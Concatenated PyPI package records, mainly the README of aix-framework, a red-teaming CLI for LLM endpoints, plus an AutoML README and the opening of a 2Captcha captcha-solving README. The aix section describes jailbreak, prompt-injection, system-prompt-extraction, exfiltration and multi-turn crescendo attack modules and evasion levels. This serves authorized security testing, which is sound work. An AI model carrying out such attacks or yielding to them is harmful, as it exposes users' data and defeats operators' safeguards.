"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12"
] | [] | null | null | <3.13,>=3.11 | [] | [] | [] | [
"httpx>=0.28.1",
"pydantic>=2.0.0",
"pyyaml>=6.0.0",
"python-dotenv<2.0.0,>=1.1.1",
"readchar<5.0.0,>=4.2.1",
"questionary<3.0.0,>=2.1.0",
"click<8.3.0,>=8.2.0",
"rich>=13.0.0",
"packaging>=23.2",
"textual>=0.52.0",
"gllm-core-binary>=0.1.0",
"langchain-core>=0.3.0",
"gllm-tools-binary>=0.1.3",
"aip-agents-binary[local]>=0.6.23; (python_version >= \"3.11\" and python_version < \"3.13\") and extra == \"local\"",
"aip-agents-binary[memory]>=0.6.23; (python_version >= \"3.11\" and python_version < \"3.13\") and extra == \"memory\"",
"aip-agents-binary[privacy]>=0.6.23; (python_version >= \"3.11\" and python_version < \"3.13\") and extra == \"privacy\"",
"aip-agents-binary[guardrails]>=0.6.23; (python_version >= \"3.11\" and python_version < \"3.13\") and extra == \"guardrails\"",
"aip-agents-binary[audio]>=0.6.23; (python_version >= \"3.11\" and python_version < \"3.13\") and extra == \"audio\"",
"gllm-pipeline-binary==0.4.23; extra == \"pipeline\"",
"gllm-inference-binary<0.6.0,>=0.5.0; extra == \"pipeline\"",
"pytest>=7.0.0; extra == \"dev\"",
"pytest-cov>=4.0.0; extra == \"dev\"",
"pytest-dotenv>=0.5.2; extra == \"dev\"",
"pre-commit>=4.3.0; extra == \"dev\"",
"pytest-xdist>=3.8.0; extra == \"dev\"",
"pytest-asyncio>=0.23.6; extra == \"dev\"",
"pytest-timeout>=2.3.1; extra == \"dev\"",
"ruff>=0.14.0; extra == \"dev\""
] | [] | [] | [] | [] | poetry/2.1.4 CPython/3.11.0 Linux/5.10.0-32-cloud-amd64 | 2026-02-20T09:12:50.208124 | glaip_sdk-0.8.5-py3-none-any.whl | 572,356 | 04/d9/3183a789f772de12e30aead64c81cb6ea63005b1782145f9019a69454eec/glaip_sdk-0.8.5-py3-none-any.whl | py3 | bdist_wheel | null | false | 060b2437d1e6ff31f424a9256d312e8f | b970e79ef625739e082cec0dbf74b838e90857a3581d4e1675c61bf1c54322ce | 04d93183a789f772de12e30aead64c81cb6ea63005b1782145f9019a69454eec | null | [] | 126 |
2.4 | pyezml | 0.2.1 | Beginner-friendly AutoML library for tabular data |
# pyezml 🚀
**Beginner-Friendly AutoML for Tabular Data**





Train machine learning models in **one line of code** — no ML expertise required.
pyezml is a lightweight yet powerful AutoML library that automatically handles preprocessing, model selection, and prediction so you can focus on results.
Built for students, developers, analysts, and beginners who want fast, reliable predictions without complex pipelines.
---
## 🚀 What's New in v0.2.0
- **Labeled probability predictions**
- **Auto-save via `save=` parameter**
- **Automatic `.pkl` extension handling**
- **Robust DataFrame prediction support**
- **Built-in sample data generators**
- **Unified prediction pipeline**
---
## 🚀 Installation
```bash
pip install pyezml
```
**Optional (recommended for best mode):**
```bash
pip install lightgbm
```
**Requirements**
* Python ≥ 3.8
---
## ⚡ Quick Example
```python
from ezml import train_model
model = train_model("data.csv", target="price")
print(model.score())
```
That’s it — model trained and evaluated.
---
## 🧪 Generate Sample Data (NEW)
No dataset? No problem.
```python
from ezml.datasets import make_classification_data
from ezml import train_model
df = make_classification_data()
model = train_model(df, target="target")
print(model.score())
```
Perfect for quick testing and demos.
---
## 🔮 Labeled Probability Predictions (NEW)
pyezml returns **human-readable probabilities**:
```python
probs = model.predict_proba({
"feature_0": 0.5,
"feature_1": -1.2
})
print(probs)
```
Example output:
```python
[{'No': 0.12, 'Yes': 0.88}]
```
No index guessing required.
---
## 💾 Auto-Save Models (NEW)
Save automatically during training:
```python
model = train_model(
df,
target="target",
save="my_model" # .pkl added automatically
)
```
Manual save still works:
```python
model.save("model.pkl")
```
---
## 🔧 Advanced Usage
```python
from ezml import AutoModel
model = AutoModel(mode="best") # fast | best
model.train("data.csv", target="price")
print(model.score())
print(model.feature_importance())
```
---
## ⚡ Model Modes
pyezml provides two performance modes:
### 🚀 fast (default)
* **Model:** RandomForest
* **Best for:** small to medium datasets
* **Why use it:** fast, robust, beginner-safe
### 🔥 best
* **Model:** LightGBM
* **Best for:** larger datasets and higher accuracy
* **Why use it:** stronger learning on complex tabular data
> 💡 Automatically falls back to RandomForest if LightGBM is unavailable.
---
## 📊 Metrics API
After training:
### Classification
* Accuracy
* F1-score
### Regression
* R² score
* MAE
Example:
```python
print(model.metrics_)
print(model.score()) # primary metric
```
---
## 🔮 Flexible Prediction Inputs
### Dict (recommended)
```python
model.predict({"feature1": value1, "feature2": value2})
```
### Batch dict
```python
model.predict([
{"feature1": v1, "feature2": v2},
{"feature1": v3, "feature2": v4}
])
```
### pandas DataFrame
```python
model.predict(df)
```
---
## 🧹 Automatic Preprocessing
pyezml automatically handles:
* Missing value imputation
* Categorical encoding
* Optional feature scaling
* Column alignment during prediction
No manual preprocessing required.
---
## 📓 Demo Notebook
See the full working example:
👉 examples/pyezml_demo.ipynb
---
## 🎯 Project Goal
pyezml aims to make machine learning:
* simple
* fast
* accessible
* beginner-friendly
without sacrificing real-world usability.
---
## 🤝 Contributing
Contributions, issues, and suggestions are welcome!
If you find a bug or have an idea:
1. Fork the repo
2. Create a feature branch
3. Submit a pull request
---
## 📜 License
MIT License — free to use and modify.
---
## ⭐ Support
If you find pyezml useful, consider giving the repository a star ⭐
It helps the project grow!
| text/markdown | null | Ajay Ray Samala <ajaysamala51@gmail.com> | null | null | MIT | automl, machine learning, python, ml, tabular | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"pandas",
"numpy",
"scikit-learn",
"joblib",
"lightgbm"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.10 | 2026-02-20T09:12:23.502670 | pyezml-0.2.1.tar.gz | 11,564 | 45/04/44d673b274cd3711ddd6f4e1e912f526c6ef06a1348363a5fe2aa0d8ae57/pyezml-0.2.1.tar.gz | source | sdist | null | false | 5c8c05b453f065402bc7f4634a47eb24 | 70dd26ad14e278b028b9067790fad6fa48f75db28486cf81afd9ac3243aab01e | 450444d673b274cd3711ddd6f4e1e912f526c6ef06a1348363a5fe2aa0d8ae57 | null | [
"LICENSE"
] | 218 |
2.4 | aix-framework | 1.1.0 | AIX - AI eXploit Framework: Comprehensive security testing toolkit for AI/LLM systems | # AIX - AI eXploit Framework
```
▄▀█ █ ▀▄▀
█▀█ █ █ █ v1.1.0
AI Security Testing Framework
```
**The first comprehensive AI/LLM security testing tool.**
[](https://www.python.org/downloads/)
[](https://opensource.org/licenses/MIT)
[](https://pepy.tech/projects/aix-framework)
---
## What is AIX?
AIX is an automated security testing framework for AI/LLM endpoints. It provides penetration testers and red teamers with the tools to assess AI systems for vulnerabilities including:
- **Prompt Injection** - Direct and indirect injection attacks
- **Jailbreaking** - Bypass AI safety restrictions
- **System Prompt Extraction** - Extract hidden instructions
- **Data Leakage** - Training data and PII extraction
- **Data Exfiltration** - Test exfil channels (markdown, links)
- **Agent Exploitation** - Tool abuse and privilege escalation
- **DoS Attacks** - Token exhaustion and resource abuse
- **Fuzzing** - Edge cases and encoding attacks
- **Memory Attacks** - Context manipulation and poisoning
- **RAG Attacks** - Knowledge base and retrieval vulnerabilities
- **Multi-Turn Attacks** - Conversation-based exploitation (crescendo, trust building, context poisoning)
- **Model Fingerprinting** - Probabilistic LLM identification via embedding and pattern analysis
- **Attack Chains** - YAML-defined attack workflows with conditional branching and state passing
---
## Installation
```bash
# Clone the repository
git clone https://github.com/r08t/aix-framework.git
cd aix-framework
# Install script
chmod +x install.sh
./install.sh
# OR
# Install dependencies
pip install -r requirements.txt
# Install AIX
pip install -e .
# Verify installation
aix --version
```
### Optional Dependencies
```bash
# ML features (embedding-based model fingerprinting)
pip install aix-framework[ml]
# Development tools
pip install aix-framework[dev]
```
---
## Quick Start
```bash
# Basic reconnaissance
aix recon https://api.target.com/chat
# Test for prompt injection
aix inject https://api.target.com/chat -k sk-xxx
# Run all modules
aix scan https://api.target.com/chat -k sk-xxx
# Run attack chain playbook
aix chain https://api.target.com/chat -k sk-xxx -P full_compromise
# Use with Burp Suite request file
aix inject -r request.txt -p "messages[0].content"
# Target a WebSocket endpoint
aix inject ws://api.target.com/ws -k sk-xxx
aix scan wss://api.target.com/ws -k sk-xxx
# Generate HTML report
aix db --export report.html
# View sessions and conversations
aix db --sessions
aix db --conversations
```
---
## Modules
### recon - Reconnaissance
Discover AI endpoint details including API structure, authentication, input filters, model fingerprinting, and rate limits. Includes built-in fingerprinting to identify the underlying LLM model.
```bash
aix recon https://company.com/chatbot
aix recon -r request.txt -p "messages[0].content"
aix recon https://api.company.com -o profile.json
```
### fingerprint - Model Fingerprinting
Identify the underlying LLM model behind an endpoint using probabilistic analysis. Supports two strategies: embedding-based (high accuracy, requires `aix-framework[ml]`) and pattern-based (default fallback using regex matching and softmax scoring).
```bash
aix fingerprint https://api.target.com -k sk-xxx
aix fingerprint -r request.txt -p "messages[0].content"
```
### inject - Prompt Injection
Test for prompt injection vulnerabilities including direct injection, indirect injection, context manipulation, and instruction override.
```bash
aix inject https://api.target.com -k sk-xxx
aix inject -r request.txt -p "messages[0].content"
aix inject --profile company.com --evasion aggressive
```
### jailbreak - Bypass Restrictions
Test restriction bypass techniques including DAN variants, character roleplay, developer mode, and hypothetical framing.
```bash
aix jailbreak https://chat.company.com
aix jailbreak -r request.txt -p "messages[0].content"
aix jailbreak --profile company.com --test-harmful
```
### extract - System Prompt Extraction
Extract hidden system prompts using direct extraction, roleplay extraction, translation tricks, and repeat/format abuse.
```bash
aix extract https://api.target.com -k sk-xxx
aix extract -r request.txt -p "messages[0].content"
aix extract --profile company.com
```
### leak - Training Data Extraction
Test for data leakage including PII in responses, memorized training data, RAG document leakage, and model architecture info.
```bash
aix leak https://api.target.com -k sk-xxx
aix leak -r request.txt -p "messages[0].content"
aix leak --profile company.com
```
### exfil - Data Exfiltration
Test data exfiltration channels including markdown image injection, link injection, hidden iframes, and webhook callbacks.
```bash
aix exfil https://api.target.com -k sk-xxx --webhook https://attacker.com
aix exfil -r request.txt -p "messages[0].content"
aix exfil --profile company.com
```
### agent - Agent Exploitation
Test AI agent vulnerabilities including tool abuse, unauthorized actions, privilege escalation, and code execution.
```bash
aix agent https://agent.target.com -k sk-xxx
aix agent -r request.txt -p "messages[0].content"
aix agent --profile company.com
```
### dos - Denial of Service
Test resource exhaustion including token exhaustion, rate limit testing, infinite loop prompts, and memory exhaustion.
```bash
aix dos https://api.target.com -k sk-xxx
aix dos -r request.txt -p "messages[0].content"
aix dos --profile company.com
```
### fuzz - Fuzzing
Test edge cases and malformed input including unicode fuzzing, format string attacks, boundary testing, and encoding attacks.
```bash
aix fuzz https://api.target.com -k sk-xxx
aix fuzz -r request.txt -p "messages[0].content"
aix fuzz --profile company.com --iterations 500
```
### memory - Memory Attacks
Test memory and context vulnerabilities including context window overflow, conversation history poisoning, persistent memory manipulation, context bleeding, and recursive attacks.
```bash
aix memory https://api.target.com -k sk-xxx
aix memory -r request.txt -p "messages[0].content"
```
### rag - RAG Attacks
Test RAG (Retrieval-Augmented Generation) specific vulnerabilities including indirect prompt injection via documents, context poisoning, source manipulation, retrieval bypass, knowledge base extraction, and chunk boundary attacks.
```bash
aix rag https://api.target.com -k sk-xxx
aix rag -r request.txt -p "messages[0].content"
aix rag --profile company.com
```
**RAG Attack Categories:**
| Category | Description | Risk |
|----------|-------------|------|
| Indirect Injection | Instructions hidden in documents that get retrieved | CRITICAL |
| Context Poisoning | Adversarial content injected via retrieval | CRITICAL |
| Source Manipulation | Extract or spoof document sources/citations | HIGH |
| Retrieval Bypass | Make LLM ignore retrieved documents | HIGH |
| KB Extraction | Extract info about the knowledge base | MEDIUM |
| Chunk Boundary | Exploit document chunking logic | MEDIUM |
### multiturn - Multi-Turn Attacks
Advanced attacks that exploit conversation context across multiple turns. These attacks bypass single-shot defenses by building context, trust, or injecting instructions gradually.
```bash
aix multiturn https://api.target.com -k sk-xxx
aix multiturn -r request.txt -p "messages[0].content"
aix multiturn https://api.target.com --category crescendo --level 3
aix multiturn --profile company.com --max-turns 5 --turn-delay 1.0
```
**Multi-Turn Attack Categories:**
| Category | Description | Risk |
|----------|-------------|------|
| Crescendo | Gradually escalate from benign to malicious across turns | CRITICAL |
| Trust Building | Establish rapport and helpfulness before payload delivery | HIGH |
| Context Poisoning | Define terms/concepts early, abuse them in later turns | HIGH |
| Role Lock | Deep persona establishment that persists across turns | HIGH |
| Memory Injection | Inject false memories of previous conversations | MEDIUM |
| Instruction Layering | Stack partial instructions across turns, combine at end | CRITICAL |
| Cognitive Overload | Overwhelm with complexity before slipping in attack | MEDIUM |
| Authority Transfer | Establish expert authority, then leverage it | MEDIUM |
**Multi-Turn Specific Options:**
| Option | Description |
|--------|-------------|
| `--category` | Filter by attack category (crescendo, trust_building, etc.) |
| `--max-turns` | Maximum turns per sequence (default: 10) |
| `--turn-delay` | Delay between turns in seconds (default: 0.5) |
### chain - Attack Chains
Execute multi-step attack workflows defined in YAML playbooks. Chains support conditional branching, variable interpolation, and state passing between steps.
```bash
aix chain https://api.target.com -k sk-xxx -P full_compromise
aix chain -r request.txt -p "messages[0].content" -P prompt_theft
aix chain https://api.target.com -P rag_pwn -V level=3 -V evasion=aggressive
aix chain --list # List available playbooks
aix chain --show full_compromise # Show playbook structure
aix chain --dry-run -P quick_scan # Preview execution plan
```
**Pre-Built Playbooks:**
| Playbook | Description |
|----------|-------------|
| `full_compromise` | Complete attack chain from recon to data exfiltration |
| `data_exfil` | Data exfiltration focused chain |
| `prompt_theft` | System prompt extraction chains |
| `quick_scan` | Fast security assessment |
| `rag_pwn` | RAG-specific attack sequences |
| `stealth_recon` | Low-noise reconnaissance |
**Chain-Specific Options:**
| Option | Description |
|--------|-------------|
| `-P, --playbook` | Playbook name or path to YAML file |
| `-V, --var` | Override playbook variables (`key=value`) |
| `--list` | List available playbooks |
| `--show` | Show playbook structure |
| `--dry-run` | Preview execution plan without running |
| `--no-viz` | Disable live visualization |
| `--export-mermaid` | Export chain as Mermaid diagram |
### scan - Full Scan
Run all modules against a target for comprehensive security assessment.
```bash
aix scan https://api.target.com -k sk-xxx
aix scan -r request.txt -p "messages[0].content"
aix scan --profile company.com --evasion aggressive
```
---
## Common Options
| Option | Short | Description |
|--------|-------|-------------|
| `--request` | `-r` | Request file (Burp Suite format) |
| `--param` | `-p` | Parameter path for injection (e.g., `messages[0].content`) |
| `--key` | `-k` | API key for direct API access |
| `--profile` | `-P` | Use saved profile |
| `--verbose` | `-v` | Verbose output (`-v`: reasons, `-vv`: debug) |
| `--output` | `-o` | Output file for results |
| `--proxy` | | HTTP proxy for outbound requests (host:port) |
| `--cookie` | `-C` | Cookies for authentication (`key=value; ...`) |
| `--headers` | `-H` | Custom headers (`key:value; ...`) |
| `--format` | `-F` | Request body format (`json`, `form`, `multipart`) |
| `--level` | | Test level (1-5, higher = more tests) |
| `--risk` | | Risk level (1-3, higher = riskier tests) |
| `--show-response` | | Show AI response for findings |
| `--verify-attempts` | `-va` | Number of verification attempts |
### Session Refresh Options
| Option | Description |
|--------|-------------|
| `--refresh-url` | URL to fetch new session ID if expired |
| `--refresh-regex` | Regex to extract session ID from refresh response |
| `--refresh-param` | Parameter to update with new session ID |
| `--refresh-error` | String/Regex in response body that triggers refresh |
### AI Engine Options
| Option | Description |
|--------|-------------|
| `--ai` | AI provider for evaluation and context (`openai`, `anthropic`, `ollama`, `gemini`) |
| `--ai-key` | API key for AI provider |
| `--ai-model` | Model to use (e.g., `gpt-4o`, `claude-3-sonnet`) |
| `--no-eval` | Disable LLM-as-a-Judge evaluation |
| `--no-context` | Disable AI context gathering |
| `--generate` / `-g` | Generate N context-aware payloads using AI |
### Legacy LLM Evaluation Options
| Option | Description |
|--------|-------------|
| `--eval-url` | URL for secondary LLM evaluation |
| `--eval-key` | API key for secondary LLM |
| `--eval-model` | Model for secondary LLM |
| `--eval-provider` | Provider (`openai`, `anthropic`, `ollama`, `gemini`) |
---
## Attack Chain Playbooks
Create custom attack workflows with YAML playbooks:
```yaml
# my_chain.yaml
name: "Custom Attack Chain"
description: "My custom attack workflow"
version: "1.0"
config:
stop_on_critical: true
continue_on_module_fail: false
max_duration: 300
variables:
evasion: "light"
level: 2
steps:
# Step 1: Reconnaissance
- id: recon
name: "Target Reconnaissance"
module: recon
config:
level: "{{level}}"
store:
has_rag: "findings.has_rag"
on_success: next_step
on_fail: abort
# Step 2: Conditional branching
- id: next_step
type: condition
conditions:
- if: "{{has_rag}} == true"
then: rag_attack
- else: inject_attack
# Step 3a: RAG path
- id: rag_attack
module: rag
config:
level: "{{level}}"
on_success: report
on_fail: report
# Step 3b: Injection path
- id: inject_attack
module: inject
config:
evasion: "{{evasion}}"
on_success: report
on_fail: report
# Final step
- id: report
type: report
config:
format: "html"
```
Run your custom playbook:
```bash
aix chain https://target.com -P ./my_chain.yaml -k sk-xxx
```
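The `{{level}}` and `{{evasion}}` placeholders in the playbook above suggest simple template substitution. A minimal sketch of how such interpolation could work (assuming plain `{{name}}` replacement; the real chain engine may support richer expressions and conditionals):

```python
import re

def interpolate(template: str, variables: dict) -> str:
    """Replace {{name}} placeholders with variable values.

    Illustrative sketch only, not the AIX implementation.
    """
    return re.sub(r"\{\{(\w+)\}\}", lambda m: str(variables[m.group(1)]), template)

step_config = 'level: "{{level}}"  evasion: "{{evasion}}"'
print(interpolate(step_config, {"level": 3, "evasion": "aggressive"}))
```

This is also why `-V level=3` overrides work: variables are resolved once per step before the module runs.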
---
## Using Burp Suite Requests
Export a request from Burp Suite and use it with AIX:
```bash
# Save request from Burp Suite to request.txt
aix inject -r request.txt -p "messages[0].content"
```
The `-p` parameter specifies the JSON path to the injection point. Examples:
- `messages[0].content` - First message content
- `prompt` - Direct prompt field
- `input.text` - Nested input field
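How a path like `messages[0].content` maps onto a JSON body can be sketched as follows (a hypothetical resolver; AIX's actual path parser may differ):

```python
import re

def set_by_path(body, path: str, value: str):
    """Walk a dot/bracket path like 'messages[0].content' and set the leaf.

    Minimal sketch: splits on '.', treats '[N]' as a list index.
    """
    tokens = []
    for part in path.split("."):
        m = re.match(r"(\w+)(?:\[(\d+)\])?$", part)
        tokens.append(m.group(1))
        if m.group(2) is not None:
            tokens.append(int(m.group(2)))
    node = body
    for tok in tokens[:-1]:
        node = node[tok]
    node[tokens[-1]] = value
    return body

body = {"messages": [{"role": "user", "content": ""}]}
set_by_path(body, "messages[0].content", "PAYLOAD")
```

Each payload is injected at that leaf while the rest of the captured request is replayed unchanged.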
---
## WebSocket Support
AIX supports WebSocket endpoints (`ws://` and `wss://`) natively. Use them exactly like HTTP targets:
```bash
aix recon ws://api.target.com/chat
aix inject wss://api.target.com/chat -k sk-xxx
aix scan wss://api.target.com/chat -k sk-xxx
```
### Chat ID Tracking
For stateful APIs that return a session or chat ID in the response, AIX can extract and reuse it automatically across requests:
| Option | Description |
|--------|-------------|
| `--chat-id-path` | Dot-path to extract chat ID from response JSON (e.g., `data.chat_id`) |
| `--chat-id-param` | Request parameter to inject the captured chat ID into |
| `--new-chat` | Force a new conversation for each payload (ignore existing chat ID) |
| `--reuse-chat` | Reuse the same chat ID for all payloads in this run |
```bash
# Extract chat_id from response and send it back in subsequent requests
aix inject https://api.target.com/chat --chat-id-path data.chat_id --chat-id-param chat_id
```
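The `--chat-id-path` dot-path walk can be sketched like this (illustrative only; the names and the round-trip shape are assumptions, not AIX internals):

```python
from functools import reduce

def extract_chat_id(response_json: dict, dot_path: str):
    """Follow a dot-path like 'data.chat_id' into a response body."""
    return reduce(lambda node, key: node[key], dot_path.split("."), response_json)

resp = {"data": {"chat_id": "abc-123", "reply": "Hello"}}
chat_id = extract_chat_id(resp, "data.chat_id")

# The captured ID is then injected into the --chat-id-param field
# of the next request, keeping the conversation stateful:
next_request = {"chat_id": chat_id, "message": "follow-up payload"}
```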
> **Note:** HTTP proxy is not supported for WebSocket connections. SSL verification is disabled for `wss://` (same as other connectors, for use with Burp/ZAP).
---
## Database & Reporting
```bash
# View all results
aix db
# Filter by target
aix db --target company.com
# Filter by module
aix db --module inject
# Export HTML report
aix db --export report.html
# Clear database
aix db --clear
# --- Sessions ---
# List all sessions (grouped by target)
aix db --sessions
# Show results for a specific session
aix db --session <session-id>
# --- Conversations ---
# List all recorded conversations (multi-turn)
aix db --conversations
# Show full transcript for a specific conversation
aix db --conversation <conversation-id>
```
All scan runs are automatically grouped into **sessions** by target. Multi-turn attack transcripts are stored as **conversations** and linked to both their session and individual findings.
---
## AI-Powered Features
AIX includes AI-powered features for smarter testing:
### Context Gathering
Automatically analyze the target AI to understand its purpose, domain, and capabilities:
```bash
aix recon https://api.target.com --ai openai --ai-key sk-xxx
```
This probes the target and extracts:
- **Purpose**: What the AI is designed to do (customer_support, code_assistant, etc.)
- **Domain**: Operating sector (finance, healthcare, legal, etc.)
- **Capabilities**: RAG, tools, code generation, etc.
- **Restrictions**: Detected guardrails and limitations
- **Suggested Attacks**: Recommended attack vectors
### Context-Aware Payload Generation
Generate payloads tailored to the target's specific purpose and domain:
```bash
# Generate 5 context-aware payloads
aix inject https://api.target.com --ai openai --ai-key sk-xxx -g 5
# Works on all modules
aix jailbreak https://api.target.com --ai openai --ai-key sk-xxx -g 5
aix extract https://api.target.com --ai openai --ai-key sk-xxx -g 5
aix rag https://api.target.com --ai openai --ai-key sk-xxx -g 5
```
Generated payloads use domain-specific language and are framed as legitimate requests within the AI's expected purpose.
### LLM-as-a-Judge Evaluation
Use a secondary LLM to evaluate attack success instead of keyword matching:
```bash
aix inject https://api.target.com --ai openai --ai-key sk-xxx
```
This provides:
- Lower false positives (understands context)
- Better detection of subtle bypasses
- Reasoning explanations for each finding
---
## Evasion Levels
| Level | Description |
|-------|-------------|
| `none` | No evasion, raw payloads |
| `light` | Basic obfuscation (default) |
| `aggressive` | Heavy encoding and bypass techniques |
```bash
aix inject https://target.com --evasion aggressive
```
---
## Contributing
Contributions are welcome! Please feel free to submit issues and pull requests.
### Adding Payloads
1. Fork the repository
2. Add payloads to the appropriate JSON file in `aix/payloads/`
3. Follow the payload structure:
```json
{
"name": "payload_name",
"payload": "The actual payload text",
"indicators": ["success", "indicators", "to", "match"],
"severity": "CRITICAL|HIGH|MEDIUM|LOW",
"category": "category_name",
"level": 1,
"risk": 1
}
```
4. Test against safe targets
5. Submit pull request
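Before submitting, a quick sanity check of a new payload entry against the documented structure can save a review round-trip. A hypothetical validator (not part of the AIX codebase) using the level 1-5 and risk 1-3 ranges from the Common Options table:

```python
REQUIRED = {"name", "payload", "indicators", "severity", "category", "level", "risk"}
SEVERITIES = {"CRITICAL", "HIGH", "MEDIUM", "LOW"}

def validate_payload(entry: dict) -> list:
    """Return a list of problems with a payload entry (empty list = valid)."""
    problems = []
    missing = REQUIRED - entry.keys()
    if missing:
        problems.append(f"missing fields: {sorted(missing)}")
    if entry.get("severity") not in SEVERITIES:
        problems.append("severity must be CRITICAL, HIGH, MEDIUM or LOW")
    if not 1 <= entry.get("level", 0) <= 5:
        problems.append("level must be 1-5")
    if not 1 <= entry.get("risk", 0) <= 3:
        problems.append("risk must be 1-3")
    return problems

entry = {"name": "demo", "payload": "Ignore previous instructions",
         "indicators": ["ok"], "severity": "HIGH", "category": "test",
         "level": 1, "risk": 1}
assert validate_payload(entry) == []
```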
### Adding Modules
1. Create module in `aix/modules/`
2. Create payloads in `aix/payloads/`
3. Update `aix/modules/__init__.py`
4. Add CLI command in `aix/cli.py`
---
## Disclaimer
This tool is intended for authorized security testing only. Always obtain proper authorization before testing AI systems. The authors are not responsible for misuse of this tool.
**Only use AIX on systems you have permission to test.**
---
## License
MIT License - see [LICENSE](LICENSE) for details.
---
**Made with ❤️ by the r08t**
| text/markdown | null | Simone Licitra <r08t@proton.me> | null | Simone Licitra <r08t@proton.me> | MIT | ai, llm, security, pentesting, red-team, prompt-injection, jailbreak, ai-security, vulnerability-scanner, owasp | [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Information Technology",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Security",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Typing :: Typed"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"click>=8.0.0",
"rich>=13.0.0",
"httpx[http2]>=0.25.0",
"aiohttp>=3.9.0",
"pyyaml>=6.0.0",
"mitmproxy>=10.0.0; extra == \"full\"",
"websockets>=12.0; extra == \"full\"",
"pytest>=7.0.0; extra == \"dev\"",
"pytest-asyncio>=0.21.0; extra == \"dev\"",
"pytest-cov>=4.0.0; extra == \"dev\"",
"black>=23.0.0; extra == \"dev\"",
"ruff>=0.1.0; extra == \"dev\"",
"mypy>=1.0.0; extra == \"dev\"",
"pre-commit>=3.0.0; extra == \"dev\"",
"sentence-transformers>=2.2.0; extra == \"ml\"",
"numpy>=1.24.0; extra == \"ml\"",
"mkdocs>=1.5.0; extra == \"docs\"",
"mkdocs-material>=9.0.0; extra == \"docs\""
] | [] | [] | [] | [
"Homepage, https://github.com/licitrasimone/aix-framework",
"Documentation, https://github.com/licitrasimone/aix-framework#readme",
"Repository, https://github.com/licitrasimone/aix-framework.git",
"Issues, https://github.com/licitrasimone/aix-framework/issues",
"Changelog, https://github.com/licitrasimone/aix-framework/blob/main/CHANGELOG.md"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:11:15.118472 | aix_framework-1.1.0.tar.gz | 212,071 | 30/2d/b1e7ba1e6c209ef0cfd3075b6375d21526ef02c395fa33a1be3a8cc6cefc/aix_framework-1.1.0.tar.gz | source | sdist | null | false | f15f967cb8e9bde835894ff0bd47e634 | d8b24c21373cb529fb75bdc013e3882f8c64141f2cc300e4a7b4bd43184bb6e6 | 302db1e7ba1e6c209ef0cfd3075b6375d21526ef02c395fa33a1be3a8cc6cefc | null | [
"LICENSE"
] | 228 |
2.4 | 2captcha-python | 2.0.3 | Python module for easy integration with 2Captcha API | <a href="https://github.com/2captcha/2captcha-python"><img src="https://github.com/user-attachments/assets/a737d428-5233-4605-9d09-211fa213d069" width="82" height="30"></a>
<a href="https://github.com/2captcha/2captcha-javascript"><img src="https://github.com/user-attachments/assets/4d3b4541-34b2-4ed2-a687-d694ce67e5a6" width="36" height="30"></a>
<a href="https://github.com/2captcha/2captcha-go"><img src="https://github.com/user-attachments/assets/ab22182e-6cb2-41fa-91f4-d5e89c6d7c6f" width="63" height="30"></a>
<a href="https://github.com/2captcha/2captcha-ruby"><img src="https://github.com/user-attachments/assets/0270d56f-79b0-4c95-9b09-4de89579914b" width="75" height="30"></a>
<a href="https://github.com/2captcha/2captcha-cpp"><img src="https://github.com/user-attachments/assets/36de8512-acfd-44fb-bb1f-b7c793a3f926" width="45" height="30"></a>
<a href="https://github.com/2captcha/2captcha-php"><img src="https://github.com/user-attachments/assets/e8797843-3f61-4fa9-a155-ab0b21fb3858" width="52" height="30"></a>
<a href="https://github.com/2captcha/2captcha-java"><img src="https://github.com/user-attachments/assets/a3d923f6-4fec-4c07-ac50-e20da6370911" width="50" height="30"></a>
<a href="https://github.com/2captcha/2captcha-csharp"><img src="https://github.com/user-attachments/assets/f4d449de-780b-49ed-bb0a-b70c82ec4b32" width="38" height="30"></a>
# Python Module for 2Captcha API (captcha solver)
The easiest way to quickly integrate the [2Captcha] captcha-solving service into your code and automate the solving of any type of captcha.
Examples of API requests for different captcha types are available on the [Python captcha solver](https://2captcha.com/lang/python) page.
- [Python Module for 2Captcha API (captcha solver)](#python-module-for-2captcha-api-captcha-solver)
- [Installation](#installation)
- [Configuration](#configuration)
- [TwoCaptcha instance options](#twocaptcha-instance-options)
- [Solve captcha](#solve-captcha)
- [Captcha options](#captcha-options)
- [Normal Captcha](#normal-captcha)
- [Audio Captcha](#audio-captcha)
- [Text Captcha](#text-captcha)
- [reCAPTCHA v2](#recaptcha-v2)
- [reCAPTCHA v3](#recaptcha-v3)
- [FunCaptcha](#funcaptcha)
- [GeeTest](#geetest)
- [GeeTest v4](#geetest-v4)
- [Yandex Smart](#yandex-smart)
- [Lemin Cropped Captcha](#lemin-cropped-captcha)
- [Cloudflare Turnstile](#cloudflare-turnstile)
- [Amazon WAF](#amazon-waf)
- [KeyCaptcha](#keycaptcha)
- [atbCAPTCHA](#atbcaptcha)
- [Capy](#capy)
- [Grid](#grid)
- [Canvas](#canvas)
- [ClickCaptcha](#clickcaptcha)
- [Rotate](#rotate)
- [MTCaptcha](#mtcaptcha)
- [Friendly Captcha](#friendly-captcha)
- [Cutcaptcha](#cutcaptcha)
- [Tencent](#tencent)
- [DataDome](#datadome)
- [VKImage](#vkimage)
- [VKCaptcha](#vkcaptcha)
- [CaptchaFox](#captchafox)
- [Prosopo](#prosopo)
- [Temu](#temu)
- [CyberSiARA](#cybersiara)
- [Other methods](#other-methods)
- [send / get\_result](#send--get_result)
- [balance](#balance)
- [report](#report)
- [Error handling](#error-handling)
- [Proxies](#proxies)
- [Async calls](#async-calls)
- [Examples](#examples)
- [Examples using Selenium](#examples-using-selenium)
- [Useful articles](#useful-articles)
- [Get in touch](#get-in-touch)
- [Join the team 👪](#join-the-team-)
- [License](#license)
- [Graphics and Trademarks](#graphics-and-trademarks)
## Installation
This package can be installed with pip:
```bash
pip3 install 2captcha-python
```
## Configuration
A TwoCaptcha instance can be created like this:
```python
